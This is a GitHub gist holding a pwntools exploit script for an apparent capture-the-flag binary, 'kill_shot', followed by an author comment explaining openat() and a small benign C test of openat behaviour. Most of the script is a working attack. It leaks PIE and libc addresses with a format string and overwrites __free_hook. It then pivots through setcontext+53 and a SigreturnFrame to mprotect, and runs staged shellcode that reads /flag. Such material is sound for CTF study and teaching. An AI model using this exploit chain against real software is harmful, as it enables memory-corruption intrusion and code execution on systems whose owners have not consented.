@Mech0n
Created March 25, 2021 12:41
setcontext + 53
#! /usr/bin/python
#-*- coding: utf-8 -*-
from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
context(arch = 'amd64' , os = 'linux', log_level='debug')

p = process('./kill_shot')
# gdb.attach(p, 'b *$rebase(0x1098)\n')

def add(size, payload):
    # menu option 1: allocate a chunk of `size` bytes and fill it with `payload`
    p.sendlineafter('3- exit', str(1))
    p.sendlineafter("Size:", str(size))
    p.sendlineafter("Data:", payload)

def delete(idx):
    # menu option 2: free the chunk at index `idx`
    p.sendlineafter('3- exit', str(2))
    p.sendlineafter("Index:", str(idx))

if __name__ == "__main__":
    # 23 25 0x1240
    # format-string leak: stack slots 24 and 25 hold a PIE pointer and a libc pointer
    p.sendlineafter("Format:", "AAAA%24$p.%25$p.")
    p.recvuntil("AAAA")
    pie = int(p.recvuntil(".")[:-1], 16) - 0x1240
    libc = int(p.recvuntil(".")[:-1], 16) - 0x021b97
    success("LIBC: " + str(hex(libc)))
    success("PIE : " + str(hex(pie)))

    setcontext = libc + 0x0000000000052070
    __free_hook = libc + 0x00000000003ed8e8
    mprotect = libc + 0x000000000011bae0
    kill = pie + 0x10B4

    # the program's 8-byte write ("Pointer:" / "Content:"); first write: __free_hook -> kill
    p.sendlineafter("Pointer:", str(__free_hook))
    p.sendafter("Content:", p64(kill))
    # gdb.attach(p, "b *%s\n" % hex((setcontext + 53)))

    # SigreturnFrame consumed by setcontext+53: free() passes the chunk in rdi,
    # so these registers are loaded and execution continues at mprotect with
    # the stack at __free_hook + 0x10
    frame = SigreturnFrame()
    frame.rsp = __free_hook + 0x10
    frame.rdi = __free_hook & 0xfffffffffffff000   # page containing __free_hook
    frame.rsi = 0x1000
    frame.rdx = 7                                  # PROT_READ | PROT_WRITE | PROT_EXEC
    frame.rip = mprotect

    # stage 1 (31 bytes + 1 nop = 32): read(0, page, 0x1000), then jump to the page
    shellcode1 = '''
        xor rdi, rdi
        mov rsi, %d
        mov rdx, 0x1000
        mov rax, 0
        syscall
        jmp rsi
    ''' % (__free_hook & 0xfffffffffffff000)

    payload = str(frame)
    add(0x100, payload) # 1
    add(0x100, payload) # 2
    delete(1)

    # each add/delete round below spends one 8-byte write, laying out
    # __free_hook + 0x08 .. + 0x30: return address for mprotect's ret, then stage 1
    p.sendlineafter("Pointer:", str(__free_hook + 0x8))
    p.sendafter("Content:", p64(__free_hook + 0x18))
    add(0x100, payload)
    delete(1)

    p.sendlineafter("Pointer:", str(__free_hook + 0x10))
    p.sendafter("Content:", p64(__free_hook + 0x18))
    add(0x100, payload)
    delete(1)

    shellcode = asm(shellcode1) + '\x90' # 32 / 8
    p.sendlineafter("Pointer:", str(__free_hook + 0x18))
    p.sendafter("Content:", shellcode[0:8])
    add(0x100, payload)
    delete(1)

    p.sendlineafter("Pointer:", str(__free_hook + 0x20))
    p.sendafter("Content:", shellcode[8:16])
    add(0x100, payload)
    delete(1)

    p.sendlineafter("Pointer:", str(__free_hook + 0x28))
    p.sendafter("Content:", shellcode[16:24])
    add(0x100, payload)
    delete(1)

    p.sendlineafter("Pointer:", str(__free_hook + 0x30))
    p.sendafter("Content:", shellcode[24:32])
    add(0x100, payload)
    delete(1)

    # finally point __free_hook at setcontext+53; the next free() fires the chain
    p.sendlineafter("Pointer:", str(__free_hook))
    p.sendafter("Content:", p64(setcontext + 53))
    add(0x100, payload)
    delete(1)

    # stage 2, read by stage 1: openat(0, "/flag", 0); read(fd, rsp, 0x50);
    # write(1, rsp, n); exit(0)
    shellcode2 = '''
        xor rdi, rdi
        push rdi
        mov rdi, 0x67616c662f
        push rdi
        mov rsi, rsp
        xor rdi, rdi
        xor rdx, rdx
        mov rax, 257
        syscall
        mov rdi, rax
        mov rsi, rsp
        mov rdx, 0x50
        mov rax, 0
        syscall
        mov rdi, 1
        mov rsi, rsp
        mov rdx, rax
        mov rax, 1
        syscall
        mov rdi, 0
        mov rax, 60
        syscall
    '''
    payload = asm(shellcode2)
    p.sendline(payload)
    p.interactive()
@Mech0n (Author) commented Mar 25, 2021

openat():

1. Prototype: int openat(int fd,const char *path,int oflag,.../* mode_t mode */);

2. Header file: #include <fcntl.h>

3. Parameter description:

(1) fd:

Compared with the open function, this function takes an additional fd parameter; the similarities and differences are as follows:

a. If path specifies an absolute path, the fd parameter is ignored and the openat function is equivalent to the open function;

b. If path specifies a relative path, the fd parameter indicates the starting location in the file system from which the relative pathname is resolved; fd is obtained by opening the directory in which the relative pathname resides;

c. path specifies a relative pathname and the fd parameter has the special value AT_FDCWD. In this case the pathname is resolved in the current working directory, and openat behaves like open.

(2) The remaining parameters are the same as for open and are not repeated here.

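As an added illustration of the three openat() cases listed in the comment (this is not code from the gist), the following C program builds a throwaway directory under /tmp (an assumption about the host) containing a file named flag, the same basename the stage-2 shellcode opens with an absolute path, and checks each case: an absolute path succeeds even with an invalid descriptor, a relative path needs a real directory descriptor, and AT_FDCWD resolves against the current working directory.

```c
#define _GNU_SOURCE
#include <fcntl.h>
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* One bit per case from the comment; a bit is set when the kernel behaves as described. */
enum {
    CASE_ABS_IGNORES_FD   = 1,  /* a. absolute path: fd is ignored, even an invalid one */
    CASE_REL_USES_DIRFD   = 2,  /* b. relative path resolved against a directory fd */
    CASE_REL_BAD_FD_FAILS = 4,  /* b. hence a relative path with a bad fd must fail */
    CASE_AT_FDCWD_IS_CWD  = 8,  /* c. AT_FDCWD resolves relative to the current directory */
};

/* Try openat() read-only and report success without leaking the descriptor. */
static int opens(int dirfd, const char *path) {
    int fd = openat(dirfd, path, O_RDONLY);
    if (fd < 0) return 0;
    close(fd);
    return 1;
}

/* Creates a sandbox directory (constructed, under /tmp) with one file and runs the
   four checks. Returns the bitmask above, or -1 if the sandbox could not be set up. */
int run_openat_cases(void) {
    char dir[] = "/tmp/openat_demo_XXXXXX";
    if (mkdtemp(dir) == NULL) return -1;
    char file[PATH_MAX];
    snprintf(file, sizeof file, "%s/flag", dir);
    int fd = open(file, O_WRONLY | O_CREAT, 0600);
    if (fd < 0) return -1;
    close(fd);
    int result = 0;
    if (opens(-1, file)) result |= CASE_ABS_IGNORES_FD;          /* -1 is not a valid fd */
    int dirfd = open(dir, O_RDONLY | O_DIRECTORY);
    if (dirfd >= 0 && opens(dirfd, "flag")) result |= CASE_REL_USES_DIRFD;
    close(dirfd);
    if (!opens(-1, "flag")) result |= CASE_REL_BAD_FD_FAILS;     /* EBADF expected */
    int saved_cwd = open(".", O_RDONLY | O_DIRECTORY);
    if (saved_cwd >= 0 && chdir(dir) == 0) {
        if (opens(AT_FDCWD, "flag")) result |= CASE_AT_FDCWD_IS_CWD;
        (void)fchdir(saved_cwd);                                  /* restore the cwd */
    }
    close(saved_cwd);
    unlink(file);
    rmdir(dir);
    return result;
}
```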